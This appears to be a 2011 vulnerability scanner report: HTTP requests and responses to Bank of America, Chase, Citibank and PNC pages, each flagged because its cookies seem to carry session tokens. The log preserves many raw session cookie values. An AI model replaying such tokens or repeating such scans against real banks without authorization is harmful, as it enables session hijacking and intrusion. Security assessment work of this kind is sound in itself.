GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hub/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:54 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/ Content-language: en-US Set-cookie: JSESSIONID=00008fBXnMpsDuQjSc8kH5YogBG:12qb4k2ev; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myexpression_banking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:36:25 GMT Content-length: 0 Content-type: text/html Location: https://www5.bankofamerica.com/planning/investments.action Content-language: en-US Set-cookie: JSESSIONID=0000MZoA15Z0qVQ4mcJR1wynojo:12qtmh33l; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/investments.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:32 GMT Content-type: text/html Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache, post-check=0, pre-check=0 Content-language: en-US Set-cookie: JSESSIONID=0000-_A2xQfu_W2uW6lF2fly4Fp:12qb4k2ev; Path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:07 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000mMBXhgo6t8S8rSEKqaClP3F:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:06 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:05 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000lQoVpN6o_Syjb5ohyReSXTa:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:04 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/Search.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Location: https://www6.bankofamerica.com/search/Search.do Content-language: en-US Set-cookie: JSESSIONID=0000d7-ksy874kdblG0_pEKtKn2:13ihk3qeh; Path=/ Set-cookie: INTL_LANG=en_US Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/sitemap/index.jsp Content-language: en-US Set-cookie: JSESSIONID=0000AHYKHX5RDNXbJ74F_kN_fGy:12qb4k2ev; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:13 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:29 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=00001dmfVt102GWARUceA1dBtn0:12qb4k7c1; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:28 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descript ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MilitaryLendingProgram HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Thu, 03 Feb 2011 01:06:32 GMT Content-type: text/html CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ccpmweb/chf/document/militarylendingrogram.html Set-Cookie: DCTMSESSION=pWqKNJ1Yv9NlgJ9kghvXKyZLpQVVXTgYyKD5x51HXqvvslJM3G4x!-661114096; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.chase.com/ccpmweb/chf/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccp/index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=JWTFNJXGmZr1X2nwQZHwnnLjtkzTGpQJ5DHvfJ94f6GFQqG4Qgyv!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chf/mortgage/om_chasecom_redirect HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:35 GMT Content-length: 959 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Set-Cookie: DCTMSESSION=ShdXNJXDQb0ZFHj1qGKczSFvgTsznLZk7Y4h2czW2Hy7tvLD7KtZ!1262409899; path=/ Connection: close
<html LANG="EN" > <head> <META NAME="robots" CONTENT="index,follow"/> <title >Chase</title> </head> <body><script language="JavaScript"> var s_pageName="Homeownership Center - Obama March 4th - chase ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skeletons/psmgenskel HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=TGFhNJXG71xk8S9N20Cn9bvPGH9yrm34fvpzv4HJ4vS1Qd9YSb6M!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=m6CMNJXFZC8PjQQGMf6sxvPhwgmTfjK0RYFv4QFJyyLQsBjXGn1m!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin/images HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=6g6NNJXFxLM7k3X2S2lR1bkgB1YqhbvphnpHhSMxkgVP6SXmGTFQ!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=jfkfNJXCyH5XHZVYYRdMBh3DlcZvv0J0RGw0MtqzPlxX9TQR6Xvp!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/logon/on_successful_logon.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: http://www.chase.com/cm/cs?urlname=shared/crb/page/notfound.jsp Set-Cookie: DCTMSESSION=NKdvNJXCtfpNBvzYPBCnfP7wBLN2Mt3mCwB2QVmpcRW091j5sTGT!-1658401948; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <bo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/cards/index.jsp HTTP/1.1 Host: www.citibank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:16:55 GMT Content-length: 854 Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=GlQxNJXX9hjkzSqQqQWNphxfGRm78JMp2dwJ21YKmvTyYW6xpK69!-455328445; path=/ Connection: close
<html> <head> <title>Citi Credit Cards | Choose from a variety of Rewards Credit Cards, Student Credit Cards, Small Business Credit Cards, and Value Credit Cards.</title> <meta name="keywords" co ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LaunchPad/dflt/Login.pncadv HTTP/1.1 Host: www.esp01.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:18:09 GMT Server: Apache Set-Cookie: JSESSIONID=0001MlXU1BY2vtyfBtHvrPCXhsj:pr-rdc678-61015gis-a/espts-ethasp8; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 7069
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"> <HEAD> <TI ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/ForgotUserIdServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/OnlineBankingServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>PNC Bank Online Banking</title> <meta http-equiv="Expires" content=" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/Forms.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Blank.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Gateway.do?siteArea=/pnccorp/PNC/Home HTTP/1.1 Host: www.pnc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993
PNCSessionCookie=/pnccorp/PNC/Home/Small Business; Expires=Thu, 02 Feb 2012 23:45:33 GMT; Path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Small+Business HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Homepage.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/NCProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Solutions.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
